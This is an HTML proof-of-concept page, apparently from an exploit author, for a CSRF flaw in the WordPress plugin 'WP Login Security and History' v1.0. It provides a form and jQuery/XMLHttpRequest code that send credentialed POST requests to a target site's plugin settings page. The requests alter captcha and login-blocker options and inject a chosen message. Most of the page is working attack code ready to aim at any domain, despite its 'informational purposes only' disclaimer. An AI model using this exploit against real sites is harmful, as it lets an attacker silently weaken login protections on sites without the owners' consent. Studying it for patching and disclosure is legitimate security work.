<!DOCTYPE html>
<!--
	 __ __ ___ ____ ____ 
	|  |  |   |__  |  __|
	| | | | / |  __|  __|
	|_|_|_|___|____|____|
-->
<html lang="en">
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<title>m0ze@blackcore:~# WP Login Security and History v1.0 CSRF PoC</title>
		<meta name="description" content="WP Login Security and History v1.0 CSRF PoC">
		<meta name="keywords" content="WP Login Security and History, CSRF, PoC, exploit">
		<meta name="author" content="m0ze">
		<script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
		<style type="text/css">
			<!--
			body {background: #000000; color: #e61d4c; padding: 20px; margin: 0; font-family: Verdana, sans-serif;}
			form {margin: 0; padding: 20px;}
			h1 {font-family: Verdana, sans-serif; font-size: 20px; line-height: 1em; border-bottom: 2px #e61d4c solid; padding-bottom: 8px;}
			::-moz-selection {color: #000000; background: #e61d4c;}
			::selection {color: #000000; background: #e61d4c;}
			*:focus {outline: none;}
			a, a:hover, a:visited, a:active {text-decoration: none; color: #e61d4c;}
			input {min-width: 280px; margin: 10px 20px 4px 0px; padding: 12px; background: #000000; border: 1px #e61d4c solid; color: #e61d4c; font-weight: bold; font-family: Verdana, sans-serif; opacity: 1; transition: 0.4s;}
			input[type="button"] {margin: 0px 20px 0px 0px; padding: 12px 54px; background: #000000; border: 1px #e61d4c solid; cursor: pointer; color: #e61d4c; font-weight: bold; font-family: Verdana, sans-serif; opacity: 1; transition: 0.4s; text-transform: uppercase;}
			input[type="button"]:hover {background: #e61d4c; border: 1px #e61d4c solid; color: #000000;}
			.checkboxblock {display: inline-block; vertical-align: middle; font-size: 14px; margin-right: 20px;}
			.custom-checkbox {position: absolute; z-index: -1; opacity: 0;}
			.custom-checkbox+label {display: inline-flex; align-items: center; user-select: none; text-transform: uppercase;}
			.custom-checkbox+label::before {content: ''; display: inline-block; width: 1em; height: 1em; flex-shrink: 0; flex-grow: 0; border: 1px solid #e61d4c; margin-right: 0.5em; background-repeat: no-repeat; background-position: center center; background-size: 50% 50%;}
			.custom-checkbox:checked+label::before {border-color: #e61d4c; background-color: #e61d4c; background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 8 8'%3e%3cpath fill='%23000000' d='M6.564.75l-3.59 3.612-1.538-1.55L0 4.26 2.974 7.25 8 2.193z'/%3e%3c/svg%3e");}
			.custom-checkbox:not(:disabled):not(:checked)+label:hover::before {border-color: #e61d4c;}
			.custom-checkbox:not(:disabled):active+label::before {background-color: #e61d4c; border-color: #e61d4c;}
			.custom-checkbox:focus:not(:checked)+label::before {border-color: #e61d4c;}
			.custom-checkbox:disabled+label::before {background-color: #e61d4c;}
			-->
		</style>
	</head>
	<body>
		<h1>### -- [ CSRF | WP Login Security and History v1.0 ]</h1>
		<h2>Info:</h2>
		<p>✖ Proof of concept is provided for informational purposes only.</p>
		<p>✖ Successful exploitation requires <b>administrator</b> privileges.</p>
		<p>✖ Injected payload will trigger an alert message with the text «Injected!».</p>
		<p>✖ Tested on WordPress v5.7 + WP Login Security and History <a href="https://wordpress.org/plugins/wp-login-security-and-history/" target="_blank">⭷</a> plugin v1.0 [2021-03-29]</p>
		<br>
		<h2>Settings:</h2>
		<h3>Target URL*:</h3>
		* Only <b>domain name</b> needed!<br>
		<input id="target" name="target" value="https://target.com">
		<br>	
		<br>
		<br>
		<h3>Login Captcha Options:</h3>
		Login Captcha:
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="can_show_captcha_option" name="can_show_captcha_option">
			<label for="can_show_captcha_option">On / Off</label>
		</div>
		<br>
		<br>
		Show Captcha After:<br>
		<input id="show_captcha_count_option" type="text" name="show_captcha_count_option" value="1337">
		<input id="logincaptchaoptions" type="button" value="Inject">
		<br>
		<br>
		<br>
		<h3>Login Blocker Options:</h3>
		Login Blocker:
		<div class="checkboxblock">
			<input type="checkbox" class="custom-checkbox" id="can_block_login_trials" name="can_block_login_trials">
			<label for="can_block_login_trials">On / Off</label>
		</div>
		<br>
		<br>
		Block Login After (attempts, minimum is 3):<br>
		<input id="login_max_trials" type="text" name="login_max_trials" value="1337">
		<br>
		<br>
		Login Blocker Time (minutes, minimum is 3):<br>
		<input id="login_block_time" type="text" name="login_block_time" value="13">
		<br>
		<br>
		Blocker page Message:<br>
		<input id="login_blocked_msg" type="text" name="login_blocked_msg" value="Injected! PoC by m0ze">
		<input id="loginblockeroptions" type="button" value="Inject">
		<br>
		<br>
		<br>
		<script>
			$("#logincaptchaoptions").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=wp_login_security_and_history.php&tab=2";
				var captchacount = $("#show_captcha_count_option").val();
				var captchacheckbox = "0";
				if ( document.getElementById( "can_show_captcha_option" ).checked ) {captchacheckbox = "1";} else {captchacheckbox = "0";}
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = "can_show_captcha_option="+captchacheckbox+"&show_captcha_count_option="+captchacount+"&Save_Options=++Update+Options++";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
			
			$("#loginblockeroptions").click(function(e){
				var url = $("#target").val().replace(/\/$/, "") + "/wp-admin/options-general.php?page=wp_login_security_and_history.php&tab=2";
				var captchacount = $("#show_captcha_count_option").val();
				var captchacheckbox = "0";
				if ( document.getElementById( "can_show_captcha_option" ).checked ) {captchacheckbox = "1";} else {captchacheckbox = "0";}
				var loginmaxattempts = $("#login_max_trials").val();
				var loginblocktime = $("#login_block_time").val();
				var loginblockedmsg = $("#login_blocked_msg").val();
				var canblockloginattempts = "0";
				if ( document.getElementById( "can_block_login_trials" ).checked ) {canblockloginattempts = "1";} else {canblockloginattempts = "0";}
				xhr = new XMLHttpRequest();
				xhr.open("POST", url, true);
				xhr.withCredentials = "true";
				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
				var body = "can_show_captcha_option="+captchacheckbox+"&show_captcha_count_option="+captchacount+"&can_block_login_trials="+canblockloginattempts+"&login_max_trials="+loginmaxattempts+"&login_block_time="+loginblocktime+"&login_blocked_msg="+loginblockedmsg+"&Save_Options=++Update+Options++";
				xhr.send(body);
				xhr.onreadystatechange = function() {if(xhr.readyState == 4 && xhr.status == 200) {alert("Injected!");}}
			});
		</script>
		<script>
			console.log(`%c
 ╔═══════════════════════════════════════════════════════════════════════════╗ 
 ║                                                                           ║ 
 ║    ███╗   ███╗ ██████╗ ███████╗███████╗    > System update available      ║ 
 ║    ████╗ ████║██╔═████╗╚══███╔╝██╔════╝    > Update: Y/N                  ║ 
 ║    ██╔████╔██║██║██╔██║  ███╔╝ █████╗      > Updating, please wait...     ║ 
 ║    ██║╚██╔╝██║████╔╝██║ ███╔╝  ██╔══╝      > System update successful!    ║ 
 ║    ██║ ╚═╝ ██║╚██████╔╝███████╗███████╗                                   ║ 
 ║    ╚═╝     ╚═╝ ╚═════╝ ╚══════╝╚══════╝    > No problem, right?           ║ 
 ║                                                                           ║ 
 ╚═══════════════════════════════════════════════════════════════════════════╝ `,"color:#e61d4c; background:#000000; font-family: monospace");
		</script>
	</body>
</html>